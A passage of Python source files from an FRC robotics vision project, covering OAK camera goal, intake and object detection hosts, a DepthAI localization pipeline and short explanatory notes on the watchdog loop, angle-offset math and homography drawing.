self.device_list['OAK-D_Goal']['nt_tab'].putString("OAK-D_Goal Stream", self.device_list['OAK-D_Goal']['stream_address'])
for frame, edgeFrame, bboxes in goal_edge_depth_detection.capture(device_info):
self.parse_goal_frame(frame, edgeFrame, bboxes)
def run_intake_detection(self, device_info):
self.device_list['OAK-1_Intake']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1_Intake']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_intake_frame(frame, edgeFrame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_goal_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_goal_frame(frame, edgeFrame, bboxes)
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
target_x = bbox['target_x'] if 'target_x' in bbox else 0
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
cv2.putText(edgeFrame, "x: {}".format(round(target_x, 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "z: {}".format(round(bbox['depth_z'], 2)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "label: {}".format(self.goal_labels[bbox['label']], 1), (bbox['x_min'], bbox['y_min'] + 130),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-D Goal Edge", edgeFrame)
cv2.imshow("OAK-D Goal ", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_intake_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_intake_frame(frame, edgeFrame, bboxes)
for i, bbox in enumerate(bboxes):
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
frame_color = (0, 255, 0) if i == 0 else (0, 150, 150)
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), frame_color, 2)
cv2.putText(frame, "x: {}".format(round(bbox['x_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "size: {}".format(round(bbox['size'], 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Intake Edge", edgeFrame)
cv2.imshow("OAK-1 Intake", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting goal-depth-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
```
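The `run()` watchdog above loops over the worker threads, but the inner `break` only exits the `for` loop, so the host keeps sleeping even after a detection thread dies. Below is a minimal sketch of a watchdog that returns as soon as any worker stops; the worker targets and the 10-second poll interval are assumptions standing in for `run_goal_detection` / `run_intake_detection`.
```python
import threading
from time import sleep


def watchdog(threads, poll_seconds=10):
    # Sketch of the assumed intent: poll the workers and return once one has died.
    while True:
        if any(not t.is_alive() for t in threads):
            return
        sleep(poll_seconds)


if __name__ == "__main__":
    # Hypothetical short-lived workers standing in for the detection threads.
    workers = [threading.Thread(target=sleep, args=(1,)) for _ in range(2)]
    for w in workers:
        w.start()
    watchdog(workers, poll_seconds=1)
    print("a worker thread has stopped")
```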
#### File: depthai-frc/intake-detection-host/main.py
```python
import argparse
import operator
import threading
from time import sleep
import cv2
import depthai as dai
import socket
from common import target_finder
from common.config import NN_IMG_SIZE
from pipelines import object_detection, object_tracker_detection, object_edge_detection
import logging
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
power_cell_counter = 0
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
        except OSError:
ip_address = 'localhost'
port1 = 5801
port2 = 5802
self.device_list = {"OAK-1": {
'name': "OAK-1",
'id': "14442C10218CCCD200",
# 'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-1_Intake")
}, "OAK-2": {
'name': "OAK-2",
# 'id': "14442C10C14F47D700",
'id': "14442C10C14F47D700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-2_Indexer")
}}
self.intake_pipeline, self.intake_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.object_pipeline, self.object_labels = object_tracker_detection.create_pipeline("infiniteRecharge2021")
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1)
self.oak_2_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2)
def parse_intake_frame(self, frame, edgeFrame, bboxes):
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-1']['nt_tab']
filtered_bboxes = []
for bbox in bboxes:
if self.intake_labels[bbox['label']] in valid_labels:
filtered_bboxes.append(bbox)
filtered_bboxes.sort(key=operator.itemgetter('size'), reverse=True)
if len(filtered_bboxes) == 0:
nt_tab.putNumber("tv", 0)
else:
nt_tab.putNumber("tv", 1)
target_angles = []
for bbox in filtered_bboxes:
angle_offset = (bbox['x_mid'] - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
target_angles.append(angle_offset)
bbox['angle_offset'] = angle_offset
nt_tab.putNumberArray("ta", target_angles)
fps = self.device_list['OAK-1']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "{}".format(self.power_cell_counter), (0, NN_IMG_SIZE - 20), cv2.FONT_HERSHEY_TRIPLEX, 2, (0, 255, 0))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, filtered_bboxes
def parse_object_frame(self, frame, bboxes):
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-2']['nt_tab']
self.power_cell_counter = 0
for bbox in bboxes:
target_label = self.object_labels[bbox['label']]
if target_label not in valid_labels:
continue
self.power_cell_counter += 1
box_color = (0, 150, 150)
if self.power_cell_counter >= 5:
box_color = (0, 255, 0)
elif self.power_cell_counter < 3:
box_color = (0, 0, 255)
for bbox in bboxes:
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), box_color, 2)
nt_tab.putNumber("powercells", self.power_cell_counter)
nt_tab.putBoolean("indexer_full", self.power_cell_counter >= 5)
width = int(frame.shape[1] * 60 / 100)
height = int(frame.shape[0] * 60 / 100)
frame = cv2.resize(frame, (width, height), interpolation=cv2.INTER_LINEAR)
fps = self.device_list['OAK-2']['fps_handler']
fps.next_iter()
cv2.putText(frame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_2_stream.send_frame(frame)
return frame, bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-1']['id'])
self.device_list['OAK-1']['nt_tab'].putBoolean("OAK-1 Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_intake_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-2']['id'])
self.device_list['OAK-2']['nt_tab'].putBoolean("OAK-2 Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_object_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_intake_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_intake_frame(frame, edgeFrame, bboxes)
def run_object_detection(self, device_info):
        self.device_list['OAK-2']['nt_tab'].putString("OAK-2 Stream", self.device_list['OAK-2']['stream_address'])
for frame, bboxes in object_tracker_detection.capture(device_info):
self.parse_object_frame(frame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_intake_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_intake_frame(frame, edgeFrame, bboxes)
for i, bbox in enumerate(bboxes):
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
frame_color = (0, 255, 0) if i == 0 else (0, 150, 150)
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), frame_color, 2)
cv2.putText(frame, "x: {}".format(round(bbox['x_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "size: {}".format(round(bbox['size'], 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Intake Edge", edgeFrame)
cv2.imshow("OAK-1 Intake", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_object_frame(self, frame, bboxes):
frame, bboxes = super().parse_object_frame(frame, bboxes)
for bbox in bboxes:
cv2.putText(frame, "id: {}".format(bbox['id']), (bbox['x_min'], bbox['y_min'] + 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "status: {}".format(bbox['status']), (bbox['x_min'], bbox['y_min'] + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Objects", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting intake-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
```
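Both intake parsers turn a detection's horizontal pixel position into a steering angle with `(x_mid - NN_IMG_SIZE / 2.0) * 68.7938003540039 / 1920`. The short sketch below isolates that conversion; the 68.79° field of view and the 1920-pixel reference width come from the code above, while `NN_IMG_SIZE = 416` is an assumed value used only for the example.
```python
NN_IMG_SIZE = 416            # assumed network input size for this example
HFOV_DEG = 68.7938003540039  # horizontal field of view used by the hosts
SENSOR_WIDTH_PX = 1920       # pixel width the FOV constant is referenced to


def angle_offset(x_mid):
    # Same expression as parse_intake_frame: signed offset from the frame centre,
    # scaled by degrees-per-pixel at the 1920-wide sensor.
    return (x_mid - NN_IMG_SIZE / 2.0) * HFOV_DEG / SENSOR_WIDTH_PX


if __name__ == "__main__":
    print(angle_offset(NN_IMG_SIZE / 2.0))  # 0.0 for a centred detection
    print(angle_offset(NN_IMG_SIZE))        # ~7.45 degrees for the right edge
```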
#### File: depthai-frc/localization-host/depthai_utils.py
```python
import uuid
from pathlib import Path
import cv2
import depthai as dai
import numpy as np
from common.config import *
from imutils.video import FPS
from common.feature_tracker import FeatureTrackerDebug, FeatureTracker, matchStereoToRefImage, calculateRotationMask
from common.image_processing import SIFT_PARAMS, drawSolvePNP
log = logging.getLogger(__name__)
LABELS = []
def create_pipeline(model_name):
global pipeline
global LABELS
global disparityMultiplier
log.info("Creating DepthAI pipeline...")
# out_depth = False # Disparity by default
# out_rectified = True # Output and display rectified streams
# lrcheck = True # Better handling for occlusions
# extended = False # Closer-in minimum depth, disparity range is doubled
# subpixel = True # Better accuracy for longer distance, fractional disparity 32-levels
# # Options: MEDIAN_OFF, KERNEL_3x3, KERNEL_5x5, KERNEL_7x7
median = dai.StereoDepthProperties.MedianFilter.KERNEL_7x7
pipeline = dai.Pipeline()
pipeline.setOpenVINOVersion(dai.OpenVINO.Version.VERSION_2021_2)
# Define sources and outputs
camRgb = pipeline.createColorCamera()
spatialDetectionNetwork = pipeline.createYoloSpatialDetectionNetwork()
monoLeft = pipeline.createMonoCamera()
monoRight = pipeline.createMonoCamera()
featureTrackerLeft = pipeline.createFeatureTracker()
featureTrackerRight = pipeline.createFeatureTracker()
stereo = pipeline.createStereoDepth()
xoutRgb = pipeline.createXLinkOut()
camRgb.preview.link(xoutRgb.input)
xoutNN = pipeline.createXLinkOut()
xoutPassthroughFrameLeft = pipeline.createXLinkOut()
xoutTrackedFeaturesLeft = pipeline.createXLinkOut()
xoutPassthroughFrameRight = pipeline.createXLinkOut()
xoutTrackedFeaturesRight = pipeline.createXLinkOut()
xinTrackedFeaturesConfig = pipeline.createXLinkIn()
# Properties
camRgb.setPreviewSize(NN_IMG_SIZE, NN_IMG_SIZE)
camRgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
camRgb.setInterleaved(False)
camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)
xoutPassthroughFrameLeft.setStreamName("passthroughFrameLeft")
xoutTrackedFeaturesLeft.setStreamName("trackedFeaturesLeft")
xoutPassthroughFrameRight.setStreamName("passthroughFrameRight")
xoutTrackedFeaturesRight.setStreamName("trackedFeaturesRight")
xinTrackedFeaturesConfig.setStreamName("trackedFeaturesConfig")
monoLeft.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
monoLeft.setBoardSocket(dai.CameraBoardSocket.LEFT)
monoRight.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
monoRight.setBoardSocket(dai.CameraBoardSocket.RIGHT)
# Setting node configs
# stereo.setOutputDepth(out_depth)
# stereo.setOutputRectified(out_rectified)
stereo.setConfidenceThreshold(255)
stereo.setRectifyEdgeFillColor(0) # Black, to better see the cutout
stereo.setMedianFilter(median) # KERNEL_7x7 default
# stereo.setLeftRightCheck(lrcheck)
# stereo.setExtendedDisparity(extended)
# stereo.setSubpixel(subpixel)
model_dir = Path(__file__).parent.parent / Path(f"resources/nn/") / model_name
blob_path = model_dir / Path(model_name).with_suffix(f".blob")
config_path = model_dir / Path(model_name).with_suffix(f".json")
nn_config = NNConfig(config_path)
LABELS = nn_config.labels
spatialDetectionNetwork.setBlobPath(str(blob_path))
spatialDetectionNetwork.setConfidenceThreshold(nn_config.confidence)
spatialDetectionNetwork.setNumClasses(nn_config.metadata["classes"])
spatialDetectionNetwork.setCoordinateSize(nn_config.metadata["coordinates"])
spatialDetectionNetwork.setAnchors(nn_config.metadata["anchors"])
spatialDetectionNetwork.setAnchorMasks(nn_config.metadata["anchor_masks"])
spatialDetectionNetwork.setIouThreshold(nn_config.metadata["iou_threshold"])
spatialDetectionNetwork.input.setBlocking(False)
spatialDetectionNetwork.setBoundingBoxScaleFactor(0.5)
spatialDetectionNetwork.setDepthLowerThreshold(100)
spatialDetectionNetwork.setDepthUpperThreshold(50000)
xoutRgb.setStreamName("rgb")
xoutNN.setStreamName("detections")
# Linking
monoLeft.out.link(stereo.left)
monoRight.out.link(stereo.right)
monoLeft.out.link(featureTrackerLeft.inputImage)
featureTrackerLeft.passthroughInputImage.link(xoutPassthroughFrameLeft.input)
featureTrackerLeft.outputFeatures.link(xoutTrackedFeaturesLeft.input)
xinTrackedFeaturesConfig.out.link(featureTrackerLeft.inputConfig)
monoRight.out.link(featureTrackerRight.inputImage)
featureTrackerRight.passthroughInputImage.link(xoutPassthroughFrameRight.input)
featureTrackerRight.outputFeatures.link(xoutTrackedFeaturesRight.input)
xinTrackedFeaturesConfig.out.link(featureTrackerRight.inputConfig)
numShaves = 2
numMemorySlices = 2
featureTrackerLeft.setHardwareResources(numShaves, numMemorySlices)
featureTrackerRight.setHardwareResources(numShaves, numMemorySlices)
featureTrackerConfig = featureTrackerRight.initialConfig.get()
camRgb.preview.link(spatialDetectionNetwork.input)
spatialDetectionNetwork.out.link(xoutNN.input)
stereo.depth.link(spatialDetectionNetwork.inputDepth)
log.info("Pipeline created.")
return pipeline, LABELS
def capture():
with dai.Device(pipeline) as device:
previewQueue = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
detectionNNQueue = device.getOutputQueue(name="detections", maxSize=4, blocking=False)
passthroughImageLeftQueue = device.getOutputQueue("passthroughFrameLeft", 8, False)
outputFeaturesLeftQueue = device.getOutputQueue("trackedFeaturesLeft", 8, False)
passthroughImageRightQueue = device.getOutputQueue("passthroughFrameRight", 8, False)
outputFeaturesRightQueue = device.getOutputQueue("trackedFeaturesRight", 8, False)
if DEBUG:
leftFeatureTracker = FeatureTrackerDebug("Feature tracking duration (frames)", "Left")
rightFeatureTracker = FeatureTrackerDebug("Feature tracking duration (frames)", "Right")
else:
leftFeatureTracker = FeatureTracker()
rightFeatureTracker = FeatureTracker()
while True:
results = {}
frame = previewQueue.get().getCvFrame()
inDet = detectionNNQueue.tryGet()
detections = []
if inDet is not None:
detections = inDet.detections
bboxes = []
height = frame.shape[0]
width = frame.shape[1]
for detection in detections:
if LABELS[detection.label] == 'power_cell':
continue
data = {
'id': uuid.uuid4(),
'label': detection.label,
'confidence': detection.confidence,
'x_min': int(detection.xmin * width),
'x_max': int(detection.xmax * width),
'y_min': int(detection.ymin * height),
'y_max': int(detection.ymax * height),
'depth_x': detection.spatialCoordinates.x / 1000,
'depth_y': detection.spatialCoordinates.y / 1000,
'depth_z': detection.spatialCoordinates.z / 1000,
}
bboxes.append(data)
if DEBUG:
cv2.rectangle(frame, (data['x_min'], data['y_min']), (data['x_max'], data['y_max']), (0, 255, 0), 2)
cv2.putText(frame, "x: {}".format(round(data['depth_x'], 2)), (data['x_min'], data['y_min'] + 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(data['depth_y'], 2)), (data['x_min'], data['y_min'] + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "z: {}".format(round(data['depth_z'], 2)), (data['x_min'], data['y_min'] + 70), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(data['confidence'], 2)), (data['x_min'], data['y_min'] + 90), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "label: {}".format(LABELS[data['label']], 1), (data['x_min'], data['y_min'] + 110), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
target_sift_params = SIFT_PARAMS[LABELS[data['label']]]
inPassthroughFrameLeft = passthroughImageLeftQueue.get()
passthroughFrameLeft = inPassthroughFrameLeft.getFrame()
leftFrame = cv2.cvtColor(passthroughFrameLeft, cv2.COLOR_GRAY2BGR)
inPassthroughFrameRight = passthroughImageRightQueue.get()
passthroughFrameRight = inPassthroughFrameRight.getFrame()
rightFrame = cv2.cvtColor(passthroughFrameRight, cv2.COLOR_GRAY2BGR)
trackedFeaturesLeft = outputFeaturesLeftQueue.get().trackedFeatures
leftFeatureTracker.trackFeaturePath(trackedFeaturesLeft)
trackedFeaturesRight = outputFeaturesRightQueue.get().trackedFeatures
rightFeatureTracker.trackFeaturePath(trackedFeaturesRight)
featuredata = {}
if any(trackedFeaturesLeft) and any(trackedFeaturesRight):
ref_good_matches, left_keypoints, left_filtered_keypoints, right_filtered_keypoints = matchStereoToRefImage(trackedFeaturesLeft, leftFrame, trackedFeaturesRight, rightFrame, target_sift_params["descriptors"])
featuredata[data['id']] = {
'frame': leftFrame,
'good_matches': ref_good_matches,
'left_keypoints': left_filtered_keypoints,
'right_keypoints': right_filtered_keypoints
}
results['featuredata'] = featuredata
if DEBUG:
if any(ref_good_matches):
src_pts = np.float32([target_sift_params['keypoints'][m.queryIdx].pt for m in ref_good_matches]).reshape(-1, 1, 2)
dst_pts = np.float32([left_keypoints[m.trainIdx].pt for m in ref_good_matches]).reshape(-1, 1, 2)
if len(src_pts) >= 4 and len(dst_pts) >=4:
try:
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
matchesMask = mask.ravel().tolist()
draw_params = dict(matchColor=(0, 255, 0), # draw matches in green color
singlePointColor=None,
matchesMask=matchesMask, # draw only inliers
flags=2)
h, w, d = target_sift_params['image'].shape
pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)
dst = cv2.perspectiveTransform(pts, M)
img2 = cv2.polylines(leftFrame, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)
img3 = cv2.drawMatches(target_sift_params['image'], target_sift_params['keypoints'], img2, left_keypoints,
ref_good_matches, None, **draw_params)
cv2.imshow("Ransac", img3)
except Exception as e:
pass
results['frame'] = frame
results['bboxes'] = bboxes
yield results
def get_pipeline():
return pipeline
def del_pipeline():
del pipeline
```
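In the DEBUG branch of `capture()`, the matched SIFT keypoints feed `cv2.findHomography`, and the reference image outline is reprojected with `cv2.perspectiveTransform`. The self-contained sketch below replays that projection step on synthetic correspondences; the point values are invented for illustration.
```python
import cv2
import numpy as np

# Invented correspondences standing in for the matched SIFT keypoints
# (a pure translation of +10 px in x and +20 px in y).
src_pts = np.float32([[0, 0], [100, 0], [100, 50], [0, 50], [50, 25], [25, 10]]).reshape(-1, 1, 2)
dst_pts = src_pts + np.float32([10, 20])

# Same call pattern as in capture(): robust homography estimate with RANSAC ...
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)

# ... then project the reference image outline into the observed frame.
h, w = 50, 100
corners = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)
print(cv2.perspectiveTransform(corners, M).reshape(-1, 2))
```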
#### File: depthai-frc/object-detection-host/main.py
```python
import argparse
import threading
from time import sleep
import cv2
import depthai as dai
import socket
from common import target_finder
from common.config import NN_IMG_SIZE
from pipelines import object_tracker_detection, object_edge_detection
import logging
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
        except OSError:
ip_address = 'localhost'
port1 = 4201
port2 = 4202
self.device_list = {"OAK-1": {
'name': "OAK-1",
'id': "14442C10C14F47D700",
# 'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-1")
}, "OAK-2": {
'name': "OAK-2",
# 'id': "14442C10C14F47D700",
'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-2")
}}
self.goal_pipeline, self.goal_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.object_pipeline, self.object_labels = object_tracker_detection.create_pipeline("infiniteRecharge2021")
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW')
self.oak_2_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2)
def parse_goal_frame(self, frame, edgeFrame, bboxes):
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
nt_tab = self.device_list['OAK-1']['nt_tab']
if len(bboxes) == 0:
nt_tab.putString("target_label", "None")
nt_tab.putNumber("tv", 0)
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
edgeFrame, target_x, target_y = target_finder.find_largest_contour(edgeFrame, bbox)
if target_x == -999 or target_y == -999:
log.error("Error: Could not find target contour")
continue
angle_offset = ((NN_IMG_SIZE / 2.0) - target_x) * 68.7938003540039 / 1920
if abs(angle_offset) > 30:
log.info("Invalid angle offset. Setting it to 0")
nt_tab.putNumber("tv", 0)
angle_offset = 0
else:
log.info("Found target '{}'\tX Angle Offset: {}".format(target_label, angle_offset))
nt_tab.putNumber("tv", 1)
nt_tab.putString("target_label", target_label)
nt_tab.putNumber("tx", angle_offset)
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
cv2.circle(edgeFrame, (int(round(target_x, 0)), int(round(target_y, 0))), radius=5, color=(128, 128, 128), thickness=-1)
bbox['target_x'] = target_x
bbox['target_y'] = target_y
bbox['angle_offset'] = angle_offset
fps = self.device_list['OAK-1']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, bboxes
def parse_object_frame(self, frame, bboxes):
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-2']['nt_tab']
power_cell_counter = 0
for bbox in bboxes:
target_label = self.object_labels[bbox['label']]
if target_label not in valid_labels:
continue
power_cell_counter += 1
box_color = (0, 150, 150)
if power_cell_counter >= 5:
box_color = (0, 255, 0)
elif power_cell_counter < 3:
box_color = (0, 0, 255)
for bbox in bboxes:
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), box_color, 2)
nt_tab.putNumber("powercells", power_cell_counter)
nt_tab.putBoolean("indexer_full", power_cell_counter >= 5)
fps = self.device_list['OAK-2']['fps_handler']
fps.next_iter()
cv2.putText(frame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_2_stream.send_frame(frame)
return frame, bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-1']['id'])
self.device_list['OAK-1']['nt_tab'].putBoolean("OAK-1 Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_goal_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-2']['id'])
self.device_list['OAK-2']['nt_tab'].putBoolean("OAK-2 Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_object_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_goal_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_goal_frame(frame, edgeFrame, bboxes)
def run_object_detection(self, device_info):
